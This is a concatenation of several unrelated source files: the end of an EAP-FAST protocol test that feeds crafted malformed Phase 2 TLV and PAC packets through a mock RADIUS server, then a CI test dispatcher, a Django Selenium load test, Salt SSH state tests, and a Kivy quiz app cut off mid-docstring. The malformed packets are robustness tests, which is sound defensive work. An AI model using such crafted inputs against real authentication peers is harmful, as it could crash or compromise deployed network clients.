    def process_clienthello(ctx, payload):
        # Feed the peer's ClientHello into a fresh TLS server context and
        # return the server's first flight wrapped in an EAP-FAST request.
        logger.info("Process ClientHello")
        ctx['sslctx'] = OpenSSL.SSL.Context(OpenSSL.SSL.TLSv1_METHOD)
        ctx['sslctx'].set_info_callback(ssl_info_callback)
        ctx['sslctx'].load_tmp_dh("auth_serv/dh.conf")
        # Anonymous DH cipher: no server certificate required
        ctx['sslctx'].set_cipher_list("ADH-AES128-SHA")
        ctx['conn'] = OpenSSL.SSL.Connection(ctx['sslctx'], None)
        ctx['conn'].set_accept_state()
        logger.info("State: " + ctx['conn'].state_string())
        ctx['conn'].bio_write(payload)
        try:
            ctx['conn'].do_handshake()
        except OpenSSL.SSL.WantReadError:
            # Expected: the handshake needs more data from the peer
            pass
        logger.info("State: " + ctx['conn'].state_string())
        data = ctx['conn'].bio_read(4096)
        logger.info("State: " + ctx['conn'].state_string())
        return struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
                           4 + 1 + 1 + len(data),
                           EAP_TYPE_FAST, 0x01) + data
    def process_clientkeyexchange(ctx, payload, appl_data):
        # Finish the handshake with the peer's second flight and send
        # appl_data (the Phase 2 test payload) through the TLS tunnel.
        logger.info("Process ClientKeyExchange")
        logger.info("State: " + ctx['conn'].state_string())
        ctx['conn'].bio_write(payload)
        try:
            ctx['conn'].do_handshake()
        except OpenSSL.SSL.WantReadError:
            pass
        ctx['conn'].send(appl_data)
        logger.info("State: " + ctx['conn'].state_string())
        data = ctx['conn'].bio_read(4096)
        logger.info("State: " + ctx['conn'].state_string())
        return struct.pack(">BBHBB", EAP_CODE_REQUEST, ctx['id'],
                           4 + 1 + 1 + len(data),
                           EAP_TYPE_FAST, 0x01) + data
    def eap_handler(ctx, req):
        # RADIUS-side EAP handler: Start, ClientHello, ClientKeyExchange
        # (with the injected payload), then optionally EAP-Failure.
        logger.info("eap_handler - RX " + req.encode("hex"))
        if 'num' not in ctx:
            ctx['num'] = 0
        ctx['num'] = ctx['num'] + 1
        if 'id' not in ctx:
            ctx['id'] = 1
        ctx['id'] = (ctx['id'] + 1) % 256
        idx = 0
        global eap_fast_proto_ctx
        eap_fast_proto_ctx = ctx
        ctx['test_done'] = False
        logger.debug("ctx['num']=%d" % ctx['num'])
        idx += 1
        if ctx['num'] == idx:
            return eap_fast_start(ctx)
        idx += 1
        if ctx['num'] == idx:
            return process_clienthello(ctx, req[6:])
        idx += 1
        if ctx['num'] == idx:
            if not test_failure:
                ctx['test_done'] = True
            return process_clientkeyexchange(ctx, req[6:], test_payload)
        idx += 1
        if ctx['num'] == idx:
            ctx['test_done'] = True
            return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
        logger.info("Past last test case")
        return struct.pack(">BBH", EAP_CODE_FAILURE, ctx['id'], 4)
    srv = start_radius_server(eap_handler)
    try:
        dev[0].connect("eap-test", key_mgmt="WPA-EAP", scan_freq="2412",
                       eap="FAST", anonymous_identity="FAST",
                       identity="user", password="password",
                       ca_cert="auth_serv/ca.pem", phase2="auth=MSCHAPV2",
                       phase1="fast_provisioning=1",
                       pac_file="blob://fast_pac_proto",
                       wait_connect=False)
        ev = dev[0].wait_event(["CTRL-EVENT-EAP-METHOD"], timeout=5)
        if ev is None:
            raise Exception("Could not start EAP-FAST")
        dev[0].dump_monitor()
        # Poll (up to ~5 s) for the handler to report the sequence done.
        ok = False
        for i in range(100):
            if eap_fast_proto_ctx:
                if eap_fast_proto_ctx['test_done']:
                    ok = True
                    break
            time.sleep(0.05)
        time.sleep(0.1)
        dev[0].request("REMOVE_NETWORK all")
        dev[0].wait_disconnected()
        if not ok:
            raise Exception("EAP-FAST TLS exchange did not complete")
        for i in range(3):
            dev[i].dump_monitor()
    finally:
        stop_radius_server(srv)
def test_eap_fast_proto_phase2(dev, apdev):
    """EAP-FAST Phase 2 protocol testing"""
    if not openssl_imported:
        raise HwsimSkip("OpenSSL python method not available")
    check_eap_capa(dev[0], "FAST")
    hapd = start_ap(apdev[0]['ifname'])
    # Each entry: (log title, raw Phase 2 TLV payload to tunnel to the
    # peer, whether the server should follow up with EAP-Failure).
    tests = [ ("Too short Phase 2 TLV frame (len=3)",
               "ABC",
               False),
              ("EAP-FAST: TLV overflow",
               struct.pack(">HHB", 0, 2, 0xff),
               False),
              ("EAP-FAST: Unknown TLV (optional and mandatory)",
               struct.pack(">HHB", 0, 1, 0xff) +
               struct.pack(">HHB", EAP_TLV_TYPE_MANDATORY, 1, 0xff),
               True),
              ("EAP-FAST: More than one EAP-Payload TLV in the message",
               struct.pack(">HHBHHB",
                           EAP_TLV_EAP_PAYLOAD_TLV, 1, 0xff,
                           EAP_TLV_EAP_PAYLOAD_TLV, 1, 0xff),
               True),
              ("EAP-FAST: Unknown Result 255 and More than one Result TLV in the message",
               struct.pack(">HHHHHH",
                           EAP_TLV_RESULT_TLV, 2, 0xff,
                           EAP_TLV_RESULT_TLV, 2, 0xff),
               True),
              ("EAP-FAST: Too short Result TLV",
               struct.pack(">HHB", EAP_TLV_RESULT_TLV, 1, 0xff),
               True),
              ("EAP-FAST: Unknown Intermediate Result 255 and More than one Intermediate-Result TLV in the message",
               struct.pack(">HHHHHH",
                           EAP_TLV_INTERMEDIATE_RESULT_TLV, 2, 0xff,
                           EAP_TLV_INTERMEDIATE_RESULT_TLV, 2, 0xff),
               True),
              ("EAP-FAST: Too short Intermediate-Result TLV",
               struct.pack(">HHB", EAP_TLV_INTERMEDIATE_RESULT_TLV, 1, 0xff),
               True),
              ("EAP-FAST: More than one Crypto-Binding TLV in the message",
               struct.pack(">HH", EAP_TLV_CRYPTO_BINDING_TLV, 60) + 60*'A' +
               struct.pack(">HH", EAP_TLV_CRYPTO_BINDING_TLV, 60) + 60*'A',
               True),
              ("EAP-FAST: Too short Crypto-Binding TLV",
               struct.pack(">HHB", EAP_TLV_CRYPTO_BINDING_TLV, 1, 0xff),
               True),
              ("EAP-FAST: More than one Request-Action TLV in the message",
               struct.pack(">HHBBHHBB",
                           EAP_TLV_REQUEST_ACTION_TLV, 2, 0xff, 0xff,
                           EAP_TLV_REQUEST_ACTION_TLV, 2, 0xff, 0xff),
               True),
              ("EAP-FAST: Too short Request-Action TLV",
               struct.pack(">HHB", EAP_TLV_REQUEST_ACTION_TLV, 1, 0xff),
               True),
              ("EAP-FAST: More than one PAC TLV in the message",
               struct.pack(">HHBHHB",
                           EAP_TLV_PAC_TLV, 1, 0xff,
                           EAP_TLV_PAC_TLV, 1, 0xff),
               True),
              ("EAP-FAST: Too short EAP Payload TLV (Len=3)",
               struct.pack(">HH3B",
                           EAP_TLV_EAP_PAYLOAD_TLV, 3, 0, 0, 0),
               False),
              ("EAP-FAST: Too short Phase 2 request (Len=0)",
               struct.pack(">HHBBH",
                           EAP_TLV_EAP_PAYLOAD_TLV, 4,
                           EAP_CODE_REQUEST, 0, 0),
               False),
              ("EAP-FAST: EAP packet overflow in EAP Payload TLV",
               struct.pack(">HHBBH",
                           EAP_TLV_EAP_PAYLOAD_TLV, 4,
                           EAP_CODE_REQUEST, 0, 4 + 1),
               False),
              ("EAP-FAST: Unexpected code=0 in Phase 2 EAP header",
               struct.pack(">HHBBH",
                           EAP_TLV_EAP_PAYLOAD_TLV, 4,
                           0, 0, 0),
               False),
              ("EAP-FAST: PAC TLV without Result TLV acknowledging success",
               struct.pack(">HHB", EAP_TLV_PAC_TLV, 1, 0xff),
               True),
              ("EAP-FAST: PAC TLV does not include all the required fields",
               struct.pack(">HHH", EAP_TLV_RESULT_TLV, 2,
                           EAP_TLV_RESULT_SUCCESS) +
               struct.pack(">HHB", EAP_TLV_PAC_TLV, 1, 0xff),
               True),
              ("EAP-FAST: Invalid PAC-Key length 0, Ignored unknown PAC type 0, and PAC TLV overrun (type=0 len=2 left=1)",
               struct.pack(">HHH", EAP_TLV_RESULT_TLV, 2,
                           EAP_TLV_RESULT_SUCCESS) +
               struct.pack(">HHHHHHHHB", EAP_TLV_PAC_TLV, 4 + 4 + 5,
                           PAC_TYPE_PAC_KEY, 0, 0, 0, 0, 2, 0),
               True),
              ("EAP-FAST: PAC-Info does not include all the required fields",
               struct.pack(">HHH", EAP_TLV_RESULT_TLV, 2,
                           EAP_TLV_RESULT_SUCCESS) +
               struct.pack(">HHHHHHHH", EAP_TLV_PAC_TLV, 4 + 4 + 4 + 32,
                           PAC_TYPE_PAC_OPAQUE, 0,
                           PAC_TYPE_PAC_INFO, 0,
                           PAC_TYPE_PAC_KEY, 32) + 32*'A',
               True),
              ("EAP-FAST: Invalid CRED_LIFETIME length, Ignored unknown PAC-Info type 0, and Invalid PAC-Type length 1",
               struct.pack(">HHH", EAP_TLV_RESULT_TLV, 2,
                           EAP_TLV_RESULT_SUCCESS) +
               struct.pack(">HHHHHHHHHHHHBHH", EAP_TLV_PAC_TLV, 4 + 4 + 13 + 4 + 32,
                           PAC_TYPE_PAC_OPAQUE, 0,
                           PAC_TYPE_PAC_INFO, 13, PAC_TYPE_CRED_LIFETIME, 0,
                           0, 0, PAC_TYPE_PAC_TYPE, 1, 0,
                           PAC_TYPE_PAC_KEY, 32) + 32*'A',
               True),
              ("EAP-FAST: Unsupported PAC-Type 0",
               struct.pack(">HHH", EAP_TLV_RESULT_TLV, 2,
                           EAP_TLV_RESULT_SUCCESS) +
               struct.pack(">HHHHHHHHHHH", EAP_TLV_PAC_TLV, 4 + 4 + 6 + 4 + 32,
                           PAC_TYPE_PAC_OPAQUE, 0,
                           PAC_TYPE_PAC_INFO, 6, PAC_TYPE_PAC_TYPE, 2, 0,
                           PAC_TYPE_PAC_KEY, 32) + 32*'A',
               True),
              ("EAP-FAST: PAC-Info overrun (type=0 len=2 left=1)",
               struct.pack(">HHH", EAP_TLV_RESULT_TLV, 2,
                           EAP_TLV_RESULT_SUCCESS) +
               struct.pack(">HHHHHHHHBHH", EAP_TLV_PAC_TLV, 4 + 4 + 5 + 4 + 32,
                           PAC_TYPE_PAC_OPAQUE, 0,
                           PAC_TYPE_PAC_INFO, 5, 0, 2, 1,
                           PAC_TYPE_PAC_KEY, 32) + 32*'A',
               True),
              ("EAP-FAST: Valid PAC",
               struct.pack(">HHH", EAP_TLV_RESULT_TLV, 2,
                           EAP_TLV_RESULT_SUCCESS) +
               struct.pack(">HHHHHHHHBHHBHH", EAP_TLV_PAC_TLV,
                           4 + 4 + 10 + 4 + 32,
                           PAC_TYPE_PAC_OPAQUE, 0,
                           PAC_TYPE_PAC_INFO, 10, PAC_TYPE_A_ID, 1, 0x41,
                           PAC_TYPE_A_ID_INFO, 1, 0x42,
                           PAC_TYPE_PAC_KEY, 32) + 32*'A',
               True),
              ("EAP-FAST: Invalid version/subtype in Crypto-Binding TLV",
               struct.pack(">HH", EAP_TLV_CRYPTO_BINDING_TLV, 60) + 60*'A',
               True) ]
    # Run one full EAP-FAST exchange per malformed payload.
    for title, payload, failure in tests:
        logger.info("Phase 2 test: " + title)
        run_eap_fast_phase2(dev, payload, failure)
def test_eap_fast_tlv_nak_oom(dev, apdev):
    """EAP-FAST Phase 2 TLV NAK OOM"""
    if not openssl_imported:
        raise HwsimSkip("OpenSSL python method not available")
    check_eap_capa(dev[0], "FAST")
    start_ap(apdev[0]['ifname'])
    # A mandatory unknown TLV forces the peer to build a NAK TLV; fail the
    # first allocation in that code path and verify the peer survives.
    payload = struct.pack(">HHB", EAP_TLV_TYPE_MANDATORY, 1, 0xff)
    with alloc_fail(dev[0], 1, "eap_fast_tlv_nak"):
        run_eap_fast_phase2(dev, payload, False)
|
dispatcher.py | import argparse
import os
import re
import socket
import socketserver
import threading
import time
import helpers
def dispatch_tests(server, commit_id):
    """Block until a registered runner accepts commit_id, then record the
    assignment and drop the commit from the pending list."""
    while True:
        print("trying to dispatch to runners")
        for candidate in server.runners:
            message = "runtest:{}".format(commit_id)
            reply = helpers.communicate(candidate['host'],
                                        int(candidate['port']), message)
            if reply != "OK":
                continue
            print("adding id {}".format(commit_id))
            server.dispatched_commits[commit_id] = candidate
            if commit_id in server.pending_commits:
                server.pending_commits.remove(commit_id)
            return
        # No runner accepted the job; wait before retrying the whole pool.
        time.sleep(2)
class ThreadingTCPServer(socketserver.ThreadingMixIn, socketserver.TCPServer):
    """TCP server handling each request in its own thread; the dispatcher's
    shared state lives in these class attributes."""
    runners = []  # registered test runners: {"host": ..., "port": ...}
    dead = False  # signals the helper threads to shut down
    # Fix: this was a list, but it is used as a mapping everywhere
    # (``server.dispatched_commits[commit_id] = runner`` and
    # ``del server.dispatched_commits[commit_id]``) — must be a dict.
    dispatched_commits = {}  # commit_id -> runner currently testing it
    pending_commits = []  # commit ids waiting to be (re)assigned
class DispatcherHandler(socketserver.BaseRequestHandler):
    """Handle one dispatcher command per connection.

    Protocol (text): "status", "register:<host>:<port>",
    "dispatch:<commit_id>", "results:<commit_id>:<msg_len>:<results>".
    """
    # Fix: the second group is now optional so bare commands such as
    # "status" match; the old pattern r"(\w+)(:.+)" rejected them.
    command_re = re.compile(r"(\w+)(:.+)*")
    BUF_SIZE = 1024

    def handle(self):
        # Fix: BaseRequestHandler dispatches to handle(); this method was
        # misnamed "handler" and therefore never ran.
        # Fix: socketserver (Python 3) delivers bytes, but the protocol is
        # text — decode once here and encode on every sendall().
        self.data = self.request.recv(self.BUF_SIZE).strip().decode("utf-8")
        command_groups = self.command_re.match(self.data)
        if not command_groups:
            self.request.sendall("Invalid command".encode("utf-8"))
            return
        command = command_groups.group(1)
        if command == "status":
            print("in status")
            self.request.sendall("OK".encode("utf-8"))
        elif command == "register":
            # Add this test runner to the pool.
            print("register")
            address = command_groups.group(2)
            host, port = re.findall(r":(\w*)", address)
            runner = {"host": host, "port": port}
            self.server.runners.append(runner)
            self.request.sendall("OK".encode("utf-8"))
        elif command == "dispatch":
            print("going to dispatch")
            commit_id = command_groups.group(2)[1:]
            if not self.server.runners:
                self.request.sendall("No runners are registered".encode("utf-8"))
            else:
                # Acknowledge first: dispatch_tests() blocks until some
                # runner accepts the commit.
                self.request.sendall("OK".encode("utf-8"))
                dispatch_tests(self.server, commit_id)
        elif command == "results":
            print("go test results")
            results = command_groups.group(2)[1:]
            results = results.split(":")
            commit_id = results[0]
            msg_length = int(results[1])
            # The first recv may have truncated the report; read the rest.
            remaining_buffer = self.BUF_SIZE - (len(command) + len(commit_id) + len(results[1]) + 3)
            if msg_length > remaining_buffer:
                self.data += self.request.recv(msg_length - remaining_buffer).strip().decode("utf-8")
            del self.server.dispatched_commits[commit_id]
            if not os.path.exists("test_results"):
                os.mkdir("test_results")
            with open("test_results/{}".format(commit_id), "w") as f:
                data = self.data.split(":")[3:]
                data = "\n".join(data)
                f.write(data)
            self.request.sendall("OK".encode("utf-8"))
        else:
            self.request.sendall("Invalid command".encode("utf-8"))
def serve():
    """Parse CLI arguments, start the dispatcher server plus its heartbeat
    and redistribution helper threads, and serve until interrupted."""
    parser = argparse.ArgumentParser()
    parser.add_argument("--host", help="dispatcher's host, by default it uses localhost", default="localhost",
                        action="store")
    parser.add_argument("--port", help="dispatcher's port, by default is uses 8888", default=8888, action="store")
    args = parser.parse_args()
    server = ThreadingTCPServer((args.host, int(args.port)), DispatcherHandler)
    print("server on {}:{}".format(args.host, args.port))

    def runner_checker(server):
        # Periodically ping every runner; reassign the commit of any runner
        # that is unreachable or replies incorrectly.
        def manage_commit_lists(runner):
            # Fix: .iteritems() is Python 2 only; iterate a snapshot since
            # the loop deletes from the dict.
            for commit, assigned_runner in list(server.dispatched_commits.items()):
                if assigned_runner == runner:
                    del server.dispatched_commits[commit]
                    server.pending_commits.append(commit)
                    break
            server.runners.remove(runner)
        while not server.dead:
            time.sleep(1)
            # Fix: was "server.runnsers" (AttributeError). Iterate a copy,
            # because manage_commit_lists() mutates server.runners. The
            # unused per-iteration socket.socket() (a descriptor leak) was
            # removed — helpers.communicate manages its own connection.
            for runner in list(server.runners):
                try:
                    response = helpers.communicate(runner["host"], int(runner['port']), "ping")
                    if response != "pong":
                        print("removing runner {}".format(runner))
                        manage_commit_lists(runner)
                except socket.error:
                    manage_commit_lists(runner)

    def redistribute(server):
        # Retry commits whose runner died.
        while not server.dead:
            for commit in server.pending_commits:
                print("running redistribute")
                print(server.pending_commits)
                dispatch_tests(server, commit)
            time.sleep(5)

    runner_heartbeat = threading.Thread(target=runner_checker, args=(server,))
    redistributor = threading.Thread(target=redistribute, args=(server,))
    try:
        runner_heartbeat.start()
        # Fix: the redistributor thread was joined below but never started,
        # so pending commits were never retried (and join() would fail).
        redistributor.start()
        server.serve_forever()
    except (KeyboardInterrupt, Exception):
        # Tell the helper threads to exit their loops, then wait for them.
        server.dead = True
        runner_heartbeat.join()
        redistributor.join()
# Start the dispatcher only when this file is executed as a script.
if __name__ == '__main__':
    serve()
|
load_test.py | from threading import Thread
from django.contrib.staticfiles.testing import StaticLiveServerTestCase
# Local imports
from yaksh.models import User, Profile, Course
from yaksh.code_server import ServerPool
from yaksh import settings
from .selenium_test import SeleniumTest
class YakshSeleniumTests(StaticLiveServerTestCase):
    """Selenium-based load test against a live Django server with a demo
    code-server pool, a demo course, and demo student/moderator users."""
    @classmethod
    def setUpClass(cls):
        # Order matters: Django live server first, then evaluator config,
        # then the code-server pool thread, then the demo fixtures.
        super(YakshSeleniumTests, cls).setUpClass()
        # setup a demo code server
        settings.code_evaluators['python']['standardtestcase'] = \
            "yaksh.python_assertion_evaluator.PythonAssertionEvaluator"
        settings.code_evaluators['c']['standardtestcase'] = \
            "yaksh.cpp_code_evaluator.CppCodeEvaluator"
        settings.code_evaluators['bash']['standardtestcase'] = \
            "yaksh.bash_code_evaluator.BashCodeEvaluator"
        code_server_pool = ServerPool(
            n=settings.N_CODE_SERVERS, pool_port=settings.SERVER_POOL_PORT
        )
        cls.code_server_pool = code_server_pool
        # Run the pool in a background thread; joined in tearDownClass().
        cls.code_server_thread = t = Thread(target=code_server_pool.run)
        t.start()
        cls.demo_student = User.objects.create_user(
            username='demo_student',
            password='demo_student',
            email='demo_student@test.com'
        )
        cls.demo_student_profile = Profile.objects.create(
            user=cls.demo_student,
            roll_number=3, institute='IIT',
            department='Chemical', position='Student'
        )
        cls.demo_mod = User.objects.create_user(
            username='demo_mod',
            password='demo_mod',
            email='demo_mod@test.com'
        )
        cls.demo_mod_profile = Profile.objects.create(
            user=cls.demo_mod,
            roll_number=0, institute='IIT',
            department='Chemical', position='Moderator'
        )
        course_obj = Course()
        course_obj.create_demo(cls.demo_mod)
        # NOTE(review): assumes the demo course gets id=1 — this presumes a
        # fresh test database; confirm create_demo() cannot run after other
        # Course rows exist.
        cls.demo_course = Course.objects.get(id=1)
        cls.demo_course.students.add(cls.demo_student)
    @classmethod
    def tearDownClass(cls):
        # Delete fixtures, then stop the code-server pool and wait for its
        # thread before tearing down the live server.
        cls.demo_student.delete()
        cls.demo_student_profile.delete()
        cls.demo_mod.delete()
        cls.demo_mod_profile.delete()
        cls.demo_course.delete()
        cls.code_server_pool.stop()
        cls.code_server_thread.join()
        super(YakshSeleniumTests, cls).tearDownClass()
    def test_load(self):
        # Drive the demo quiz through Selenium as the demo student.
        url = '%s%s' % (self.live_server_url, '/exam/login/')
        quiz_name = "Yaksh Demo quiz"
        module_name = "Demo Module"
        course_name = "Yaksh Demo course"
        selenium_test = SeleniumTest(url=url, quiz_name=quiz_name,
                                     module_name=module_name,
                                     course_name=course_name)
        selenium_test.run_load_test(
            url=url, username='demo_student', password='demo_student'
        )
|
test_state.py | # -*- coding: utf-8 -*-
# Import Python libs
from __future__ import absolute_import, print_function, unicode_literals
import glob
import logging
import os
import shutil
import threading
import time
import logging
# Import Salt Testing Libs
from tests.support.runtests import RUNTIME_VARS
from tests.support.case import SSHCase
from tests.support.helpers import flaky
# Import Salt Libs
from salt.ext import six
from salt.ext.six.moves import range # pylint: disable=redefined-builtin
from tests.support.case import SSHCase
from tests.support.helpers import flaky
# Import Salt Testing Libs
from tests.support.runtests import RUNTIME_VARS
from tests.support.unit import skipIf
SSH_SLS = "ssh_state_tests"
SSH_SLS_FILE = "/tmp/salt_test_file"
log = logging.getLogger(__name__)
class SSHStateTest(SSHCase):
    """
    testing the state system with salt-ssh
    """

    def _check_dict_ret(self, ret, val, exp_ret, equal=True):
        # Assert every per-minion entry in `ret` carries `exp_ret` under key
        # `val` (or does not, when equal=False).
        self.assertIsInstance(ret, dict)
        for key, value in ret.items():
            self.assertIsInstance(value, dict)
            if equal:
                self.assertEqual(value[val], exp_ret)
            else:
                self.assertNotEqual(value[val], exp_ret)

    def _check_request(self, empty=False):
        # Verify the pending state.request: absent when empty=True, otherwise
        # pointing at our test SLS.
        check = self.run_function("state.check_request", wipe=False)
        if empty:
            self.assertFalse(bool(check), "bool({0}) is not False".format(check))
        else:
            self._check_dict_ret(
                ret=check["default"]["test_run"]["local"]["return"],
                val="__sls__",
                exp_ret=SSH_SLS,
            )

    @skipIf(True, "SLOWTEST skip")
    def test_state_apply(self):
        """
        test state.apply with salt-ssh
        """
        ret = self.run_function("state.apply", [SSH_SLS])
        self._check_dict_ret(ret=ret, val="__sls__", exp_ret=SSH_SLS)
        check_file = self.run_function("file.file_exists", [SSH_SLS_FILE])
        self.assertTrue(check_file)

    @skipIf(True, "SLOWTEST skip")
    def test_state_sls_id(self):
        """
        test state.sls_id with salt-ssh
        """
        # check state.sls_id with test=True
        ret = self.run_function("state.sls_id", ["ssh-file-test", SSH_SLS, "test=True"])
        self._check_dict_ret(
            ret=ret,
            val="comment",
            exp_ret=(
                "The file {} is set to be changed\n"
                "Note: No changes made, actual changes may\n"
                "be different due to other states."
            ).format(SSH_SLS_FILE),
        )
        # check state.sls_id without test=True
        ret = self.run_function("state.sls_id", ["ssh-file-test", SSH_SLS])
        self._check_dict_ret(ret=ret, val="__sls__", exp_ret=SSH_SLS)
        # make sure the other id in the state was not run
        self._check_dict_ret(ret=ret, val="__id__", exp_ret="second_id", equal=False)
        check_file = self.run_function("file.file_exists", [SSH_SLS_FILE])
        self.assertTrue(check_file)

    @skipIf(True, "SLOWTEST skip")
    def test_state_sls_wrong_id(self):
        """
        test state.sls_id when id does not exist
        """
        # check state.sls_id with test=True
        ret = self.run_function("state.sls_id", ["doesnotexist", SSH_SLS])
        assert "No matches for ID" in ret

    @skipIf(True, "SLOWTEST skip")
    def test_state_sls_id_with_pillar(self):
        """
        test state.sls_id with pillar data
        """
        self.run_function(
            "state.sls_id",
            ["ssh-file-test", SSH_SLS, 'pillar=\'{"test_file_suffix": "_pillar"}\''],
        )
        check_file = self.run_function(
            "file.file_exists", ["/tmp/salt_test_file_pillar"]
        )
        self.assertTrue(check_file)

    @skipIf(True, "SLOWTEST skip")
    def test_state_show_sls(self):
        """
        test state.show_sls with salt-ssh
        """
        ret = self.run_function("state.show_sls", [SSH_SLS])
        self._check_dict_ret(ret=ret, val="__sls__", exp_ret=SSH_SLS)
        # show_sls only renders, so the managed file must not have been created
        check_file = self.run_function("file.file_exists", [SSH_SLS_FILE], wipe=False)
        self.assertFalse(check_file)

    @skipIf(True, "SLOWTEST skip")
    def test_state_show_top(self):
        """
        test state.show_top with salt-ssh
        """
        ret = self.run_function("state.show_top")
        self.assertEqual(ret, {"base": ["core", "master_tops_test"]})

    @skipIf(True, "SLOWTEST skip")
    def test_state_single(self):
        """
        state.single with salt-ssh
        """
        ret_out = {"name": "itworked", "result": True, "comment": "Success!"}
        single = self.run_function(
            "state.single", ["test.succeed_with_changes name=itworked"]
        )
        self.assertIsInstance(single, dict)
        for key, value in six.iteritems(single):
            self.assertIsInstance(value, dict)
            self.assertEqual(value["name"], ret_out["name"])
            self.assertEqual(value["result"], ret_out["result"])
            self.assertEqual(value["comment"], ret_out["comment"])

    @skipIf(True, "SLOWTEST skip")
    def test_show_highstate(self):
        """
        state.show_highstate with salt-ssh
        """
        # FIX: the docstring above originally terminated with ''' instead of
        # """, which swallowed this method body into the string literal and
        # broke parsing of the file.
        high = self.run_function('state.show_highstate')
        destpath = os.path.join(RUNTIME_VARS.TMP, 'testfile')
        self.assertIsInstance(high, dict)
        self.assertIn(destpath, high)
        self.assertEqual(high[destpath]["__env__"], "base")

    @skipIf(True, "SLOWTEST skip")
    def test_state_high(self):
        """
        state.high with salt-ssh
        """
        ret_out = {"name": "itworked", "result": True, "comment": "Success!"}
        high = self.run_function(
            "state.high", ['"{"itworked": {"test": ["succeed_with_changes"]}}"']
        )
        self.assertIsInstance(high, dict)
        for key, value in six.iteritems(high):
            self.assertIsInstance(value, dict)
            self.assertEqual(value["name"], ret_out["name"])
            self.assertEqual(value["result"], ret_out["result"])
            self.assertEqual(value["comment"], ret_out["comment"])

    @skipIf(True, "SLOWTEST skip")
    def test_show_lowstate(self):
        """
        state.show_lowstate with salt-ssh
        """
        low = self.run_function("state.show_lowstate")
        self.assertIsInstance(low, list)
        self.assertIsInstance(low[0], dict)

    @skipIf(True, "SLOWTEST skip")
    def test_state_low(self):
        """
        state.low with salt-ssh
        """
        ret_out = {"name": "itworked", "result": True, "comment": "Success!"}
        low = self.run_function(
            "state.low",
            ['"{"state": "test", "fun": "succeed_with_changes", "name": "itworked"}"'],
        )
        self.assertIsInstance(low, dict)
        for key, value in six.iteritems(low):
            self.assertIsInstance(value, dict)
            self.assertEqual(value["name"], ret_out["name"])
            self.assertEqual(value["result"], ret_out["result"])
            self.assertEqual(value["comment"], ret_out["comment"])

    @skipIf(True, "SLOWTEST skip")
    def test_state_request_check_clear(self):
        """
        test state.request system with salt-ssh
        while also checking and clearing request
        """
        request = self.run_function("state.request", [SSH_SLS], wipe=False)
        self._check_dict_ret(ret=request, val="__sls__", exp_ret=SSH_SLS)
        self._check_request()
        clear = self.run_function("state.clear_request", wipe=False)
        self._check_request(empty=True)

    @skipIf(True, "SLOWTEST skip")
    def test_state_run_request(self):
        """
        test state.request system with salt-ssh
        while also running the request later
        """
        request = self.run_function("state.request", [SSH_SLS], wipe=False)
        self._check_dict_ret(ret=request, val="__sls__", exp_ret=SSH_SLS)
        run = self.run_function("state.run_request", wipe=False)
        check_file = self.run_function("file.file_exists", [SSH_SLS_FILE], wipe=False)
        self.assertTrue(check_file)

    @flaky
    @skipIf(True, "SLOWTEST skip")
    def test_state_running(self):
        """
        test state.running with salt-ssh
        """

        def _run_in_background():
            self.run_function("state.sls", ["running"], wipe=False)

        bg_thread = threading.Thread(target=_run_in_background)
        bg_thread.start()
        expected = 'The function "state.pkg" is running as'
        state_ret = []
        # Poll up to 30 times (5s apart) until the background run is visible.
        for _ in range(30):
            time.sleep(5)
            get_sls = self.run_function("state.running", wipe=False)
            state_ret.append(get_sls)
            if expected in " ".join(get_sls):
                # We found the expected return
                break
        else:
            self.fail(
                "Did not find '{0}' in state.running return: {1}".format(
                    expected, state_ret
                )
            )
        # make sure we wait until the earlier state is complete
        future = time.time() + 120
        while True:
            if expected not in " ".join(self.run_function("state.running", wipe=False)):
                break
            if time.time() > future:
                self.fail(
                    "state.pkg is still running overtime. Test did not clean up correctly."
                )

    def tearDown(self):
        """
        make sure to clean up any old ssh directories
        """
        salt_dir = self.run_function("config.get", ["thin_dir"], wipe=False)
        self.assertIsInstance(salt_dir, six.string_types)
        if os.path.exists(salt_dir):
            shutil.rmtree(salt_dir)
        # Remove files created by the test states (including pillar suffixes).
        for test_file_path in glob.glob(SSH_SLS_FILE + "*"):
            os.remove(test_file_path)
|
login1.py | from kivymd.app import MDApp
from kivy.uix.floatlayout import FloatLayout
from kivy.lang import Builder
from kivy.uix.boxlayout import BoxLayout
from kivy.uix.screenmanager import ScreenManager, Screen, FadeTransition
from kivymd.uix.label import MDLabel
from kivy.properties import StringProperty
from kivy.properties import NumericProperty
from kivy.clock import Clock
from kivymd.uix.behaviors import RectangularRippleBehavior, BackgroundColorBehavior
from kivy.core.window import Window
from kivy.uix.widget import Widget
from kivy.properties import StringProperty,ObjectProperty
from kivy.animation import Animation
from kivy.utils import get_color_from_hex
from kivy.core.text import LabelBase
from kivy.event import EventDispatcher
from kivymd.uix.button import MDRectangleFlatButton,MDRoundFlatButton,MDRectangleFlatButton,MDRaisedButton
import json
import requests
import time
from kivy.network.urlrequest import UrlRequest
import random
from urllib.request import urlopen
from kivy.uix.popup import Popup
from kivy.graphics import Color
import urllib.parse
import urllib.request
import inspect, os
import _thread
import threading
from kivy.core.window import Window
from database import DataBase
# Light-green window background used by every screen.
Window.clearcolor = (.666, 1, .372, 1)
# Register fonts: map Kivy's default "Roboto" name to the bundled Quando
# typeface for both regular and bold weights.
LabelBase.register(
    name="Roboto",
    fn_regular="Quando.ttf",
    fn_bold="Quando.ttf"
)
class Question:
    """Plain data holder for one quiz question and its answer options."""

    # Attribute names, in constructor-argument order.
    _FIELDS = ("question", "answer", "option2", "option3", "option4", "correct")

    def __init__(self, question, answer, option2, option3, option4, correct):
        values = (question, answer, option2, option3, option4, correct)
        for field, value in zip(self._FIELDS, values):
            setattr(self, field, value)
class ListQuestions:
    """Loads quiz questions from the local JSON store and serves random ones."""

    def __init__(self, directory="/questions"):
        self.directory = directory
        self.questions_python = []
        self.read_questions()

    def get_question_python(self):
        """Return one randomly chosen python Question."""
        return self.questions_python[random.randint(0, len(self.questions_python) - 1)]

    def read_questions(self):
        """Populate self.questions_python from questions/firebase.json."""
        with open(os.getcwd() + '/questions/firebase.json') as json_file:
            json_data = json.load(json_file)
        for q in json_data:
            if q["category"] == "python":
                self.questions_python.append(
                    Question(q["quest"], q["answer"], q["option2"],
                             q["option3"], q["option4"], q["correct"]))
            else:
                print("else")

    def update(self):
        """Refresh the local question store from the Firebase export.

        BUG FIXES vs. original:
        - `request.get(url)` referenced an undefined name; the module in
          scope is `requests`.
        - `json.load(response)` passed a Response object where a file object
          is expected; use `response.json()`.
        - The data was written to misspelled 'firbase.json', so
